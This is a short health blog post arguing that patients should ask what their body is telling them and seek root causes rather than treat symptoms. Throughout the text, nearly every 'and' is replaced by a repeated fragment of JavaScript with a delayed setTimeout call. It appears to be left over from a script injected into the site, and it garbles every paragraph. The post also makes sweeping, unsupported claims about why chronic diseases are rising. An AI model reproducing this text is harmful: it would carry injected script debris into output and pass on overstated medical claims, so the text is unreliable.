The Greatest Health Question

3d man with red question markTrying to figure out why your health is broken can be a frustrating experience. No one wants to feel bad or be slowed down by a medical condition. Blood tests, MRIs, CT scans, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and other tests can be scary andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and confusing.  Some doctors are intimidating andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and hard to talk to.   Searching for your own answers to a health crisis can be overwhelming.

This is why I always recommend that patients start by asking themselves one simple question: “What is my body trying to tell me?” See, we have an amazing intelligence inside of our body that wants to repair andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and heal us at all times. If you’ve been overworked, it will make you fatigued. If you eat a harmful bacteria, it will cause you to throw up to get that bacteria out. If you have an infection, it will raise your temperature to burn the infection out. The list is long of all the incredible healing responses your body will perform.

What has confused so many of us is that modern day medicine has taught us to treat the response (aka symptom), not the reason the body is reacting in a certain way. If you want to start leading a life that is free from disease, you need to start cluing in to the signals that your body gives you.

Diseases like heart disease, cancer, diabetes, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and obesity are all on the rise because we have a health care system that is focused on treating the result of a healing crisis, not the cause.

Make sure the next time you find yourself in your doctor’s office, you ask more questions like: “why is my body having this response?” andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and “how can we treat the cause not just the symptom”. Engaging your doctor in these kinds of conversations will get you more answers than a just a prescription sheet.

Your body is wise. Learn to read it. Surround yourself with a healthcare team that will work with you andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and give you lifestyle solutions to your body’s imbalances. Keep digging for answers. If you ask enough questions of your body, you will see exactly why it is behaving the way it is.
